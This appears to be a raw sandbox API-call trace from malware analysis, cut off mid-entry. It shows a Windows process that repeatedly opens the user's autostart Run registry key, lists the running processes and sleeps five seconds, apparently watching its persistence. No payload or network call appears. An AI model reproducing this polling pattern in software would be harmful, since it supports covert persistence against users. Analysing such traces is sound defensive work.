ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.182] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.182] NtClose (Handle=0x154) returned 0x0 [0179.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.186] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.201] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.201] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.201] NtClose (Handle=0x154) returned 0x0 [0179.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.204] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.204] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.225] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.225] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.226] NtClose (Handle=0x154) returned 0x0 [0179.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.230] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.244] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.245] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.245] NtClose (Handle=0x154) returned 0x0 [0179.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.249] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.260] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.260] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.260] NtClose (Handle=0x154) returned 0x0 [0179.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.264] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.275] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.276] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.276] NtClose (Handle=0x154) returned 0x0 [0179.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.280] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.291] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.291] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.291] NtClose (Handle=0x154) returned 0x0 [0179.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.295] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.308] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.308] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.308] NtClose (Handle=0x154) returned 0x0 [0179.308] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.312] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.322] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.322] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.322] NtClose (Handle=0x154) returned 0x0 [0179.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.323] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.327] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.338] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.338] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.338] NtClose (Handle=0x154) returned 0x0 [0179.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.339] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.340] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.340] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.342] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.343] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.354] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.354] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.354] NtClose (Handle=0x154) returned 0x0 [0179.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.355] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.355] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.358] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.369] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.369] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.369] NtClose (Handle=0x154) returned 0x0 [0179.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.374] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.385] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.385] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.385] NtClose (Handle=0x154) returned 0x0 [0179.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.390] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.400] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.400] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.400] NtClose (Handle=0x154) returned 0x0 [0179.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, 